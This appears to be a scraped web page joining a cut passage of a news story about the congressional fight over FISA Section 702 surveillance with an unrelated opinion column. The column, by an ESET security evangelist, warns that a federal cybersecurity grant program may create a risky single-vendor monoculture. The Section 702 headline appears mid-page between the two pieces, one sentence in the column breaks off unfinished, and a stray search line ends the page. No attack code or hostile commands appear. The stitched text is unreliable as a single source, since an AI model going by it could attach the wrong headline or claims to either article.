Several aides attributed the drawn-out nature of the fight, at least in part, to the relative naivete of the House speaker on national security matters, saying that, with little experience in the area, Johnson had not previously had the opportunity to be captured by the intelligence community—powerful interests accused by congressional staffers of routinely deploying “fear tactics” to defend surveillance operations plagued by regular error and abuse.

Johnson’s lack of any intelligence background, staffers say, would have likely increased his dependence on House intelligence staffers, who, while cultivating a sense of awe due to their access to national secrets, routinely behave as ambassadors between the spy agencies and regular congressional staff.

House members remained in the dark Monday morning as to the details of Johnson and Scalise’s purported plan for Section 702, and whether the compromise—potentially to arrive later this week—would include popular measures aimed at ending a prominent data broker loophole, through which US spy agencies are known to purchase information on Americans for which a warrant is typically required.

Johnson, notably, previously voted in favor of legislation that would have drastically reformed the 702 program with a slew of privacy protections.

Despite the uncommon bipartisan support for reforming Section 702, sources familiar with the negotiations say pro-privacy amendments have a history of dying in backroom deals. An amendment proposed last summer to ban the US military from tracking Americans’ cell phones without a warrant was snuffed out in a closed-door session despite winning widespread support in the House. Yet another amendment—which would have done little to interfere with the federal government’s domestic surveillance work—likewise gained support in the House two years ago. But even this half-measure ultimately found itself on the chopping block after negotiations were moved into rooms open to neither the public nor the press.

The effectiveness of this latest round of pro-privacy bipartisanship came as a surprise to many in the national security establishment. Congressional sources say that a year ago, only a feeble resistance to reauthorizing the surveillance was anticipated. Even its biggest detractors acknowledge that the 702 program is likely vital to the US national defense, crucial to investigations of terrorist threats, acts of espionage, and the constant deluge of cyberattacks aimed at US companies and national infrastructure.

To the contrary, a serious challenge to continuing the program under status quo conditions did arise in the fall of 2023. Compounded by the sudden fight over the House speakership in October, the smooth reauthorization of Section 702 became a distant fantasy. Working groups established in the House to find common ground eventually disintegrated, leaving only two discernible factions in their wake—one that believes the FBI should apply for warrants before accessing US calls, texts, and emails intercepted by US spies; and another that says warrants are too much of a burden for investigators.

What’s counted toward compromise since then might best be described as a “rounding error.” Lawmakers opposed to warrants agreed in December that the FBI should obtain a warrant before accessing 702 data in investigations that lack a foreign component. But of the hundreds of thousands of Americans queried by the bureau each year, only a small fraction fall into this category—fewer than 1 percent, according to some civil liberties experts.

The Section 702 program was last extended in December until April, when certifications issued by the Foreign Intelligence Surveillance Court expire, ending a requirement that American companies cooperate with the intelligence community’s wiretap demands. Some experts have forecast that the intelligence community may begin to apply for new certifications as early as next month, allowing the surveillance to continue uninterrupted for an additional year, even if Congress fails to act.

It is often the last resort of congressional leaders to block privacy-enhancing bills from reaching the floor for a vote—even if the result is that a surveillance program goes suddenly unauthorized by Congress. Letting a program expire is often preferable to allowing a vote to take place if it runs the risk of enshrining unwanted restrictions in the law.

Expired surveillance programs can find ways to carry on. US lawmakers introduced bills twice last year, for instance, with measures aimed at banning FBI surveillance techniques technically rendered unlawful four years after Congress failed to reauthorize Section 215: a package of surveillance tools provided by the 9/11-era Patriot Act legislation.

House leaders—Democrats at the time—faced similar popular opposition to continuing the 215 surveillance under status quo conditions. Rather than risk a vote that might permanently kill the programs, it was simply allowed to expire. Since then, the FBI has continued availing itself of the surveillance techniques, year after year, “grandfathering” in a bevy of new cases.

A Backroom Deal Looms Over Section 702 Surveillance Fight

In a monoculture, cybercriminals need to look for a weakness in only one product, or discover an exploitable vulnerability, to affect a significant portion of services.

Source: Skorzewiak via Alamy Stock Photo

Could the US federal government inadvertently be fueling perfect storm conditions for another unprecedented cyber incident that would have widespread implications for federal, state, and critical infrastructure services, similar to the recent CrowdStrike outage? 

**Setting the Stage**

The US State and Local Cybersecurity Grant Program (SLCGP) provides funding to eligible entities to improve cybersecurity posture and reduce the risk of a cyberattack. This is, of course, good, as many public entities have lacked the budget necessary to have a cybersecurity posture suitable to protect the personal data or services they provide.

Prior to this funding, each entity would make their own decision on cybersecurity and need to fund it from existing budgets. For example, a school district may select a vendor based on services and price, the neighboring school district could choose a different vendor, and so on. For the financially frugal, this would seem like a bad solution. If entities were to group together and use a single vendor, they would get bulk purchase discounts and lower the amount of tax dollars spent. 

But ask a cybersecurity professional to describe the best cybersecurity posture and they will use terms like "defense in depth" or "layers of defense." This refers to the use of multiple technologies, and in most cases multiple vendors, in order to thwart potential attacks, or incidents such as CrowdStrike's single corrupt driver causing a global outage at multiple major companies. 

When the SolarWinds cyberattack unfolded there were 33,000 private, federal, and state users of the technology, with about 18,000 installing the malicious update. The backlash of this supply chain attack resulted in new regulation on improving supply chain security, and this continues to play out today. While the attack was devastating, it was not a cyber-Armageddon event, as states, entities within states, federal agencies, and such were using a diverse set of solutions from different vendors.

The recent, unfortunate incident suffered by CrowdStrike customers highlights how devastating a single vendor issue can be, with just 8.5 million devices affected globally (representing less than 1% of Windows devices) causing mass global disruption to airlines, healthcare facilities, businesses, and more. 

**Creating a Monoculture**

Now consider the offer of SLCGP, which gives free money to spend on cybersecurity — it's like moths attracted to a light. A state can apply for funds from the grant to cover multiple entities within its jurisdiction. Once granted, a vendor is selected and offered to entities statewide, either free or highly discounted due to volume licensing. This creates a monoculture cybersecurity environment, or a perfect storm for a major cyber incident, where if the primary vendor is attacked or has a significant vulnerability exploited, it could take out the entire state's services, every school district, local government administration, etc. The effect on everyday society could be devastating. 

The SolarWinds and CrowdStrike incidents demonstrate, on a limited scale, that when a single vendor suffers an incident of some type, if there are enough affected parties, the incident becomes significant, and if they are all grouped in a single state, it becomes a major incident.

If a single vendor becomes the de facto standard for states that apply for SLCGP (a good possibility: I personally know of some organizations that have been rolled into a standard solution as part of a no-cost, or near-no-cost, state solution)

To put this in context, there are approximately 50 million US children of school age. If 90% of states are customers of one solution, and this includes state-funded education, the impact of a cyber incident would see 45 million children's educations being disrupted. And in some instances, schools have suffered significantly when hit by a cyber incident — requiring closure for potentially months. And education is just one area affected by single-vendor risk.

The SLCGP appears to be creating a new monoculture environment, on a scale that could make the previous incidents pale into insignificance. Monoculture is a term typically used in farming. In brief, it is about crop rotation — diversity in planting in order to protect both the crop and the fields in which the crops are planted. If a single crop is planted in the same field over several seasons the outcome results in bad yield. 

**Promoting Diversity in Cybersecurity**

In 2015, an academic paper detailed the issues of monoculture cybersecurity relating to the use of antivirus (AV) products. It concluded that "lowered infection rates were positively correlated with higher rates of AV activity, stable AV product usage and status, and AV product diversity." The importance of a diverse product selection prevents a single incident, whether malicious or unfortunate, from causing a catastrophic outage. 

The actions by states to standardize on a single product using the SLCGP is creating a dominant security product scenario that causes monoculture, a default standard for cybercriminals to attack. Cybercriminals need to look for a weakness in only one product, or to discover an exploitable vulnerability, to affect a significant portion of services, potentially affecting the entire population of a state.

The solution is to promote, and require, diverse layers of defense architecture, and this should be a requirement of receiving SLCGP funding. 

**About the Author**

Chief Security Evangelist, ESET

With over 20 years of security industry experience, Tony Anscombe is an established author, blogger and speaker on the current threat landscape, security technologies and products, data protection, privacy and trust and internet safety. His speaking portfolio includes industry conferences RSA, Black Hat, VB, CTIA, MEF, Gartner Risk and Security Summit and the Child Internet Safety Summit. He is regularly quoted in security, technology, and business media, including BBC, the Guardian, the New York Times and USA Today, with broadcast appearances on Bloomberg, BBC, CTV, KRON, and CBS.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us